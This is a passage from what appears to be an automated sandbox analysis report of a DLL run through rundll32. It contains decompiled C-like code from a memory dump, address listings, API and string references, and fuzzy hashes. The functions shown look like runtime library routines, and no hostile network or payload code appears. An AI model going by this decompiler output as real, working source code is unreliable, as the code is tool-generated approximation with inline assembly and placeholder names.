																								__eflags = _t428 - _t322;
																								if(_t428 != _t322) {
																									E10031020(_t468, _t468 + _t428 * 4, _t322 - _t428, 4, E100268ED);
																								}
																								goto L122;
																							} else {
																								_push(_v624);
																								_push(_t373);
																								_push(_t373);
																								_push(_t483);
																								L66();
																								_t373 = _t302;
																							}
																							L123:
																							__eflags = _v664;
																							if(_v664 != 0) {
																								E100268B3(_v676);
																							}
																							_t313 = _t373;
																						} else {
																							_t313 = _t483 + 1;
																							__eflags = _t415 - _t483 + 1;
																							if(_t415 == _t483 + 1) {
																								_t291 = _v617;
																								goto L102;
																							} else {
																								_push(_t468);
																								_push(0);
																								_push(0);
																								_push(_t483);
																								L66();
																							}
																						}
																						__eflags = _v24 ^ _t519;
																						return E100037EA(_t313, _v24 ^ _t519, _t468);
																					} else {
																						goto L86;
																					}
																				}
																			} else {
																				_t332 = 0xc;
																				L83:
																				return _t332;
																			}
																		} else {
																			goto L73;
																		}
																	}
																} else {
																	_t338 = 0xc;
																	L70:
																	return _t338;
																}
															} else {
																goto L56;
															}
															goto L127;
															L56:
															_t341 = _v28;
															_t469 = _v36;
															 *((intOrPtr*)(_v20 + _t341)) = _t469;
															_t255 = _t341 + 4;
															_v28 = _t255;
															_t465 = _t469 + _v32 * 2;
															_v36 = _t465;
															__eflags = _t255 - _v48;
														} while (_t255 != _v48);
														goto L57;
													}
												} else {
													_t503 = _t502 | 0xffffffff;
													_v24 = _t502 | 0xffffffff;
													L58:
													E100268B3(_t478);
													_pop(_t389);
													goto L59;
												}
											} else {
												while(1) {
													_t442 = 0x2a;
													_v20 = _t442;
													_t443 = 0x3f;
													_v18 = _t443;
													_v16 = 0;
													_t349 = E1002FC2F(_t247,  &_v20);
													_t389 =  *_t498;
													__eflags = _t349;
													if(_t349 != 0) {
														_t350 = E100272AB(_t389, _t349,  &(_v616.cAlternateFileName));
														_t523 = _t523 + 0xc;
														_v24 = _t350;
														_t503 = _t350;
													} else {
														_t351 =  &(_v616.cAlternateFileName);
														_push(_t351);
														_push(_t478);
														_push(_t478);
														_push(_t389);
														L79();
														_t503 = _t351;
														_t523 = _t523 + 0x10;
														_v24 = _t503;
													}
													__eflags = _t503;
													if(_t503 != 0) {
														break;
													}
													_t498 = _v28 + 4;
													_v28 = _t498;
													_t247 =  *_t498;
													__eflags = _t247;
													if(_t247 != 0) {
														continue;
													} else {
														_t366 = _v616.cAlternateFileName;
														_t388 = _v48;
														goto L42;
													}
													goto L127;
												}
												_t366 = _v616.cAlternateFileName;
												L59:
												_t461 = _t366;
												_v40 = _t461;
												__eflags = _v48 - _t461;
												asm("sbb ecx, ecx");
												_t391 =  !_t389 & _v48 - _t461 + 0x00000003 >> 0x00000002;
												__eflags = _t391;
												_v20 = _t391;
												if(_t391 != 0) {
													_t505 = _t391;
													do {
														E100268B3( *_t366);
														_t478 = _t478 + 1;
														_t366 = _t366 + 4;
														__eflags = _t478 - _t505;
													} while (_t478 != _t505);
													_t366 = _v616.cAlternateFileName;
													_t503 = _v24;
												}
												E100268B3(_t366);
												goto L64;
											}
										} else {
											_t352 = E1002449E(__eflags);
											_t503 = 0x16;
											 *_t352 = _t503;
											E1000E314();
											L64:
											__eflags = _v12 ^ _t516;
											return E100037EA(_t503, _v12 ^ _t516, _t461);
										}
									} else {
										goto L23;
									}
									goto L127;
									L23:
									_t354 = _v12;
									_t448 = _v16;
									 *((intOrPtr*)(_v32 + _t354)) = _t448;
									_t225 = _t354 + 4;
									_t382 = _t448 + _v20;
									_v16 = _t448 + _v20;
									_v12 = _t225;
									__eflags = _t225 - _v40;
								} while (_t225 != _v40);
								goto L24;
							}
						} else {
							_t495 = _t494 | 0xffffffff;
							_v12 = _t495;
							L25:
							E100268B3(_t364);
							_pop(_t383);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t364;
							_t359 = E100315D0(_t217,  &_v8);
							_t383 =  *_t490;
							__eflags = _t359;
							if(_t359 != 0) {
								_push( &_v44);
								_push(_t359);
								_push(_t383);
								L92();
								_t521 = _t521 + 0xc;
								_v12 = _t359;
								_t495 = _t359;
							} else {
								_t360 =  &_v44;
								_push(_t360);
								_push(_t364);
								_push(_t364);
								_push(_t383);
								L66();
								_t495 = _t360;
								_t521 = _t521 + 0x10;
								_v12 = _t495;
							}
							__eflags = _t495;
							if(_t495 != 0) {
								break;
							}
							_t490 = _a4 + 4;
							_a4 = _t490;
							_t217 =  *_t490;
							__eflags = _t217;
							if(_t217 != 0) {
								continue;
							} else {
								_t476 = _v44;
								_t381 = _v40;
								goto L9;
							}
							goto L127;
						}
						_t476 = _v44;
						L26:
						_t457 = _t476;
						_v32 = _t457;
						__eflags = _v40 - _t457;
						asm("sbb ecx, ecx");
						_t385 =  !_t383 & _v40 - _t457 + 0x00000003 >> 0x00000002;
						__eflags = _t385;
						_v28 = _t385;
						if(_t385 != 0) {
							_t497 = _t385;
							do {
								E100268B3( *_t476);
								_t364 = _t364 + 1;
								_t476 = _t476 + 4;
								__eflags = _t364 - _t497;
							} while (_t364 != _t497);
							_t476 = _v44;
							_t495 = _v12;
						}
						E100268B3(_t476);
						goto L31;
					}
				} else {
					_t361 = E1002449E(_t532);
					_t495 = 0x16;
					 *_t361 = _t495;
					E1000E314();
					L31:
					return _t495;
				}
				L127:
			}

0x10026add
0x10026ae0
0x10026ae4
0x10026ae6
0x10026afc
0x10026b00
0x10026b03
0x10026b05
0x10026b07
0x10026b09
0x10026b0b
0x10026b0e
0x10026b11
0x10026b14
0x10026b16
0x10026b79
0x10026b7b
0x10026b7e
0x10026b80
0x10026b84
0x10026b8d
0x10026b8e
0x10026b91
0x10026b93
0x10026b96
0x10026b9a
0x10026b9a
0x10026b9c
0x10026b9e
0x10026ba0
0x10026ba2
0x10026ba2
0x10026ba4
0x10026ba7
0x10026baa
0x10026baa
0x10026bac
0x10026bad
0x10026bad
0x10026bb8
0x10026bba
0x10026bbd
0x10026bbe
0x10026bc1
0x10026bc1
0x10026bc5
0x10026bc8
0x10026bcb
0x10026bcb
0x10026bcb
0x10026bd8
0x10026bda
0x10026bdd
0x10026bdf
0x10026bf7
0x10026bfa
0x10026bfd
0x10026bff
0x10026c02
0x10026c04
0x10026c07
0x10026c0a
0x10026c67
0x10026c6a
0x10026c6d
0x10026c6f
0x00000000
0x10026c0c
0x10026c0e
0x10026c0e
0x10026c10
0x10026c13
0x10026c13
0x10026c15
0x10026c17
0x10026c1d
0x10026c20
0x10026c20
0x10026c22
0x10026c23
0x10026c23
0x10026c27
0x10026c2a
0x10026c2d
0x10026c31
0x10026c3e
0x10026c43
0x10026c46
0x10026c48
0x10026cbc
0x10026cbd
0x10026cbe
0x10026cbf
0x10026cc0
0x10026cc1
0x10026cc6
0x10026cca
0x10026ccc
0x10026ccf
0x10026cd6
0x10026cd9
0x10026cdc
0x10026cdf
0x10026ce0
0x10026ce3
0x10026ce6
0x10026ce8
0x10026cfe
0x10026cff
0x10026d00
0x10026d02
0x10026d04
0x10026d06
0x10026d08
0x10026d0a
0x10026d0d
0x10026d10
0x10026d13
0x10026d15
0x10026d83
0x10026d85
0x10026d88
0x10026d8a
0x10026d8e
0x10026d97
0x10026d98
0x10026d9b
0x10026d9d
0x10026da0
0x10026da4
0x10026da4
0x10026da6
0x10026da8
0x10026daa
0x10026dac
0x10026dac
0x10026dae
0x10026db1
0x10026db4
0x10026db4
0x10026db7
0x10026dba
0x10026dba
0x10026dca
0x10026dd0
0x10026dd3
0x10026dd4
0x10026dd7
0x10026dd7
0x10026ddb
0x10026ddb
0x10026de9
0x10026deb
0x10026dee
0x10026df0
0x10026e08
0x10026e0b
0x10026e0e
0x10026e10
0x10026e13
0x10026e15
0x10026e18
0x10026e1b
0x10026e85
0x10026e88
0x10026e8b
0x10026e8d
0x00000000
0x10026e1d
0x10026e1f
0x10026e1f
0x10026e21
0x10026e24
0x10026e24
0x10026e26
0x10026e28
0x10026e2e
0x10026e31
0x10026e31
0x10026e34
0x10026e37
0x10026e37
0x10026e41
0x10026e49
0x10026e4d
0x10026e53
0x10026e59
0x10026e5e
0x10026e61
0x10026e63
0x10026ee4
0x10026ee5
0x10026ee6
0x10026ee7
0x10026ee8
0x10026ee9
0x10026eee
0x10026ef1
0x10026ef2
0x10026ef4
0x10026ef5
0x10026ef8
0x10026ef8
0x10026efb
0x10026efb
0x10026efd
0x10026efe
0x10026efe
0x10026f02
0x10026f03
0x10026f0a
0x10026f0d
0x10026f10
0x10026f12
0x10026f1a
0x10026f1c
0x10026f1f
0x10026f29
0x10026f2c
0x10026f2d
0x10026f2f
0x10026f43
0x10026f43
0x10026f46
0x10026f50
0x10026f55
0x10026f58
0x10026f5a
0x00000000
0x10026f5c
0x10026f5c
0x10026f61
0x10026f68
0x10026f6b
0x10026f6d
0x10026f7e
0x10026f80
0x10026f82
0x10026f82
0x10026f82
0x10026f6f
0x10026f70
0x10026f75
0x10026f78
0x10026f87
0x10026f8d
0x00000000
0x10026f90
0x10026f31
0x10026f31
0x10026f37
0x10026f3c
0x10026f3f
0x10026f41
0x10026f93
0x10026f95
0x10026f96
0x10026f97
0x10026f98
0x10026f99
0x10026f9a
0x10026f9f
0x10026fa2
0x10026fa3
0x10026fa5
0x10026fa6
0x10026fa9
0x10026faa
0x10026fab
0x10026fad
0x10026fad
0x10026fb0
0x10026fb0
0x10026fb3
0x10026fb6
0x10026fb6
0x10026fbb
0x10026fc4
0x10026fc7
0x10026fca
0x10026fcc
0x10026fd5
0x10026fd6
0x10026fd9
0x10026fe3
0x10026fe7
0x10026fe9
0x10026ffd
0x10026ffd
0x10027000
0x1002700a
0x1002700f
0x10027012
0x10027014
0x00000000
0x10027016
0x10027016
0x10027020
0x10027022
0x10027024
0x10027032
0x10027034
0x10027038
0x10027038
0x10027026
0x10027027
0x1002702c
0x1002703c
0x10027042
0x00000000
0x10027044
0x10026feb
0x10026feb
0x10026ff1
0x10026ff6
0x10026ff9
0x10026ffb
0x10027047
0x10027049
0x1002704a
0x1002704b
0x1002704c
0x1002704d
0x1002704e
0x10027053
0x10027056
0x10027057
0x10027059
0x1002705f
0x10027066
0x10027069
0x1002706c
0x1002706f
0x10027070
0x10027071
0x10027074
0x1002707a
0x1002707c
0x1002707e
0x1002707e
0x10027080
0x10027082
0x00000000
0x00000000
0x10027084
0x10027086
0x10027088
0x1002708a
0x10027095
0x10027097
0x10027099
0x00000000
0x00000000
0x10027099
0x1002708a
0x00000000
0x10027086
0x1002709b
0x1002709b
0x100270a1
0x100270a3
0x100270a9
0x100270ab
0x100270cd
0x100270cd
0x100270cf
0x100270d1
0x100270dd
0x100270dd
0x100270d3
0x100270d3
0x100270d5
0x00000000
0x100270d7
0x100270d7
0x100270d9
0x100270db
0x00000000
0x00000000
0x100270db
0x100270d5
0x100270e5
0x100270ed
0x100270f3
0x100270f4
0x100270f6
0x100270fe
0x10027104
0x1002710a
0x10027110
0x10027124
0x10027129
0x10027134
0x10027144
0x1002714a
0x1002714c
0x1002714f
0x10027172
0x10027172
0x10027177
0x1002717d
0x1002717d
0x10027183
0x10027189
0x1002718f
0x10027195
0x1002719b
0x100271bc
0x100271c1
0x100271c6
0x100271ca
0x100271d0
0x100271d3
0x100271e6
0x100271e6
0x100271ec
0x100271f2
0x100271f3
0x100271f4
0x100271f9
0x100271fc
0x10027202
0x10027204
0x10027262
0x10027268
0x10027270
0x10027275
0x1002727b
0x1002727c
0x00000000
0x00000000
0x00000000
0x100271d5
0x100271d5
0x100271d8
0x100271da
0x10027206
0x10027206
0x1002720c
0x10027214
0x10027219
0x00000000
0x100271dc
0x100271dc
0x100271df
0x00000000
0x100271e1
0x100271e1
0x100271e4
0x00000000
0x00000000
0x00000000
0x00000000
0x100271e4
0x100271df
0x100271da
0x1002727e
0x1002727f
0x00000000
0x1002721a
0x10027228
0x10027228
0x10027230
0x10027236
0x1002723c
0x10027243
0x10027246
0x10027248
0x10027258
0x1002725d
0x00000000
0x10027151
0x10027151
0x10027157
0x10027158
0x10027159
0x1002715a
0x10027162
0x10027162
0x10027285
0x10027285
0x1002728d
0x10027295
0x1002729a
0x1002729b
0x100270ad
0x100270ad
0x100270b0
0x100270b2
0x100270c7
0x00000000
0x100270b4
0x100270b4
0x100270b7
0x100270b8
0x100270b9
0x100270ba
0x100270bf
0x100270b2
0x100272a1
0x100272aa
0x00000000
0x00000000
0x00000000
0x10026ffb
0x10026fce
0x10026fd0
0x10026fd1
0x10026fd4
0x10026fd4
0x00000000
0x00000000
0x00000000
0x10026f41
0x10026f14
0x10026f16
0x10026f17
0x10026f19
0x10026f19
0x00000000
0x00000000
0x00000000
0x00000000
0x10026e65
0x10026e65
0x10026e6b
0x10026e6e
0x10026e71
0x10026e77
0x10026e7a
0x10026e7d
0x10026e80
0x10026e80
0x00000000
0x10026e24
0x10026df2
0x10026df2
0x10026df5
0x10026e8f
0x10026e90
0x10026e95
0x00000000
0x10026e95
0x10026d17
0x10026d17
0x10026d19
0x10026d1a
0x10026d20
0x10026d21
0x10026d27
0x10026d30
0x10026d37
0x10026d39
0x10026d3b
0x10026d59
0x10026d5e
0x10026d61
0x10026d64
0x10026d3d
0x10026d3d
0x10026d40
0x10026d41
0x10026d42
0x10026d43
0x10026d44
0x10026d49
0x10026d4b
0x10026d4e
0x10026d4e
0x10026d66
0x10026d68
0x00000000
0x00000000
0x10026d71
0x10026d74
0x10026d77
0x10026d79
0x10026d7b
0x00000000
0x10026d7d
0x10026d7d
0x10026d80
0x00000000
0x10026d80
0x00000000
0x10026d7b
0x10026dfd
0x10026e96
0x10026e99
0x10026e9d
0x10026ea6
0x10026ea9
0x10026ead
0x10026ead
0x10026eaf
0x10026eb2
0x10026eb4
0x10026eb6
0x10026eb8
0x10026ebd
0x10026ebe
0x10026ec2
0x10026ec2
0x10026ec6
0x10026ec9
0x10026ec9
0x10026ecd
0x00000000
0x10026ed4
0x10026cea
0x10026cea
0x10026cf1
0x10026cf2
0x10026cf4
0x10026ed5
0x10026eda
0x10026ee3
0x10026ee3
0x00000000
0x00000000
0x00000000
0x00000000
0x10026c4a
0x10026c4a
0x10026c50
0x10026c53
0x10026c56
0x10026c59
0x10026c5c
0x10026c5f
0x10026c62
0x10026c62
0x00000000
0x10026c13
0x10026be1
0x10026be1
0x10026be4
0x10026c71
0x10026c72
0x10026c77
0x00000000
0x10026c77
0x10026b18
0x10026b18
0x10026b1b
0x10026b23
0x10026b26
0x10026b2d
0x10026b2f
0x10026b31
0x10026b4c
0x10026b4d
0x10026b4e
0x10026b4f
0x10026b54
0x10026b57
0x10026b5a
0x10026b33
0x10026b33
0x10026b36
0x10026b37
0x10026b38
0x10026b39
0x10026b3a
0x10026b3f
0x10026b41
0x10026b44
0x10026b44
0x10026b5c
0x10026b5e
0x00000000
0x00000000
0x10026b67
0x10026b6a
0x10026b6d
0x10026b6f
0x10026b71
0x00000000
0x10026b73
0x10026b73
0x10026b76
0x00000000
0x10026b76
0x00000000
0x10026b71
0x10026bec
0x10026c78
0x10026c7b
0x10026c7f
0x10026c88
0x10026c8b
0x10026c8f
0x10026c8f
0x10026c91
0x10026c94
0x10026c96
0x10026c98
0x10026c9a
0x10026c9f
0x10026ca0
0x10026ca4
0x10026ca4
0x10026ca8
0x10026cab
0x10026cab
0x10026caf
0x00000000
0x10026cb6
0x10026ae8
0x10026ae8
0x10026aef
0x10026af0
0x10026af2
0x10026cb7
0x10026cbb
0x10026cbb
0x00000000

APIs

_free.LIBCMT ref: 10026C72

Strings

*?, xrefs: 10026B1B

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: c56d30aa011644074e53267160d15b05e436b7d09828aa63056be6a414574a16
Instruction ID: 847a7b85ac657849b28afe8b1ecbe38e924a00e319cb61a108d93b801de08f7f
Opcode Fuzzy Hash: c56d30aa011644074e53267160d15b05e436b7d09828aa63056be6a414574a16
Instruction Fuzzy Hash: 4AE15B75E0021A9FCB14CFA8D8819EEFBF5EF4C350B65816AE815E7340E771AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 10025C61, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 276
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10025C61(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed short _v772;
				void* __ebp;
				signed int _t152;
				void* _t159;
				signed int _t160;
				signed int _t162;
				signed int _t163;
				intOrPtr _t164;
				signed int _t167;
				signed int _t169;
				intOrPtr _t170;
				signed int _t173;
				signed int _t175;
				void* _t176;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				signed int _t220;
				intOrPtr* _t221;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t152 =  *0x1004d054; // 0x944e5696
				_v8 = _t152 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E10023FB6(__ecx, __edx) + 0x278;
				_t159 = E100250E8(__edx, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t159 == 0) {
					L39:
					_t160 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x2
					_t252 = _t10 << 4;
					_t162 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t162 !=  *_t220) {
							break;
						}
						if( *_t162 == 0) {
							L6:
							_t163 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t162 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t162 = _t162 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t163 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t164 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t164 - _v704;
							} while (_t164 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t167 = E10024214(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t167;
							__eflags = _t167;
							if(_t167 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_v728 = _t167 + 4;
								_t169 = E10028A30(_t167 + 4, _v708,  &_v272);
								_t264 = _t263 + 0xc;
								__eflags = _t169;
								if(_t169 != 0) {
									_t170 = _v728;
									_push(_t170);
									_push(_t170);
									_push(_t170);
									_push(_t170);
									_push(_t170);
									E1000E341();
									asm("int3");
									_push(_t260);
									_t173 = (_v772 & 0x0000ffff) - 0x2d;
									__eflags = _t173;
									if(_t173 == 0) {
										L51:
										__eflags = 0;
										return 0;
									} else {
										_t175 = _t173 - 1;
										__eflags = _t175;
										if(_t175 == 0) {
											_t176 = 2;
											return _t176;
										} else {
											__eflags = _t175 == 0x31;
											if(_t175 == 0x31) {
												goto L51;
											} else {
												__eflags = 1;
												return 1;
											}
										}
									}
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E10024D73(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E1002E537(_t244, __eflags, _v704, 1, 0x10044cf0, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E1003FDBF( &_v528,  *0x1004d0b4, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0x10044d78; // 0x100245b6
									 *0x1004223c(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0x1004d178;
										if(_t232 == 0x1004d178) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E100268B3( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E100268B3( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E100268B3( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t160 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E100268B3( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
										E100268B3(_v724);
										 *(_t246 + 8) = _v744;
										goto L39;
									}
									goto L40;
								}
							}
						} else {
							_t160 = _t244;
							L40:
							return E100037EA(_t160, _v8 ^ _t260, _t244);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t163 = _t162 | 0x00000001;
					__eflags = _t163;
					goto L8;
				}
				L52:
			}

0x10025c61
0x10025c6c
0x10025c73
0x10025c76
0x10025c77
0x10025c7e
0x10025c7f
0x10025c82
0x10025c92
0x10025cb5
0x10025cba
0x10025cbf
0x10025f75
0x10025f75
0x10025f75
0x00000000
0x10025cc5
0x10025cc5
0x10025cc8
0x10025ccb
0x10025cd1
0x10025cd7
0x10025cda
0x10025cdc
0x10025cdf
0x10025ce9
0x10025cef
0x00000000
0x00000000
0x10025cf5
0x10025d1e
0x10025d1e
0x10025cf7
0x10025cf7
0x10025cff
0x10025d06
0x10025d0c
0x00000000
0x10025d0e
0x10025d0e
0x10025d11
0x10025d1c
0x00000000
0x00000000
0x00000000
0x00000000
0x10025d1c
0x10025d0c
0x10025d2b
0x10025d2d
0x10025d36
0x10025d3c
0x10025d3f
0x10025d3f
0x10025d42
0x10025d45
0x10025d45
0x10025d55
0x10025d63
0x10025d68
0x10025d6f
0x10025d71
0x00000000
0x10025d77
0x10025d7d
0x10025d8a
0x10025d93
0x10025da6
0x10025dad
0x10025db2
0x10025db5
0x10025db7
0x10025ff5
0x10025ffb
0x10025ffc
0x10025ffd
0x10025ffe
0x10025fff
0x10026000
0x10026005
0x10026008
0x1002600f
0x1002600f
0x10026012
0x10026028
0x10026028
0x1002602b
0x10026014
0x10026014
0x10026014
0x10026017
0x10026025
0x10026027
0x10026019
0x10026019
0x1002601c
0x00000000
0x1002601e
0x10026020
0x10026022
0x10026022
0x1002601c
0x10026017
0x10025dbd
0x10025dbd
0x10025dcb
0x10025dce
0x10025de4
0x10025deb
0x10025df0
0x10025dd0
0x10025dd0
0x10025dd8
0x00000000
0x10025dda
0x10025dda
0x10025de0
0x10025de0
0x10025dd8
0x10025df7
0x10025dfe
0x10025e01
0x10025eff
0x10025f02
0x10025f0f
0x10025f12
0x10025f1a
0x10025f1a
0x10025f04
0x10025f0a
0x10025f0a
0x10025e07
0x10025e07
0x10025e13
0x10025e19
0x10025e1f
0x10025e22
0x10025e28
0x10025e2b
0x10025e2e
0x00000000
0x00000000
0x10025e30
0x10025e39
0x10025e3d
0x10025e46
0x10025e4a
0x10025e4b
0x10025e51
0x10025e57
0x10025e5d
0x10025e60
0x00000000
0x00000000
0x10025e62
0x10025e81
0x10025e81
0x10025e84
0x10025ea1
0x10025ea6
0x10025ea9
0x10025eab
0x10025ee9
0x10025ead
0x10025ead
0x10025eb3
0x10025eb8
0x10025ec0
0x10025ec1
0x10025ec1
0x10025ed8
0x10025edf
0x10025ee2
0x10025ee4
0x10025ee4
0x10025eef
0x10025ef5
0x10025ef5
0x10025efa
0x00000000
0x10025efa
0x10025e64
0x10025e66
0x10025e6b
0x10025e71
0x10025e7a
0x10025e7d
0x10025e7d
0x00000000
0x10025e66
0x10025f1d
0x10025f1d
0x10025f21
0x10025f29
0x10025f2f
0x10025f32
0x10025f38
0x10025f3a
0x10025f86
0x10025f8c
0x10025fd8
0x10025fd8
0x10025f8e
0x10025f93
0x10025f93
0x10025f99
0x10025f9d
0x00000000
0x10025f9f
0x10025fa3
0x10025fac
0x10025fb8
0x10025fbd
0x10025fc6
0x10025fcc
0x10025fcf
0x10025fcf
0x10025f9d
0x10025fde
0x10025fe6
0x10025fec
0x10025fef
0x10025f3c
0x10025f42
0x10025f4c
0x10025f5e
0x10025f65
0x10025f72
0x00000000
0x10025f72
0x00000000
0x10025f3a
0x10025db7
0x10025d2f
0x10025d2f
0x10025f77
0x10025f85
0x10025f85
0x00000000
0x10025d2d
0x10025d26
0x10025d28
0x10025d28
0x00000000
0x10025d28
0x00000000

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

_free.LIBCMT ref: 10025F4C
_free.LIBCMT ref: 10025F65
_free.LIBCMT ref: 10025FA3
_free.LIBCMT ref: 10025FAC
_free.LIBCMT ref: 10025FB8

Strings

C, xrefs: 10025DBD

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 9dc0fb1ca5f463f5db6b5af44ed4f027f2feaede1bd810cdfab43a669e4722c1
Instruction ID: f4aafdac77f09b8263a2eb5dd3b4e6a66393a76b9c0d6fd7f3033f3f19c4753f
Opcode Fuzzy Hash: 9dc0fb1ca5f463f5db6b5af44ed4f027f2feaede1bd810cdfab43a669e4722c1
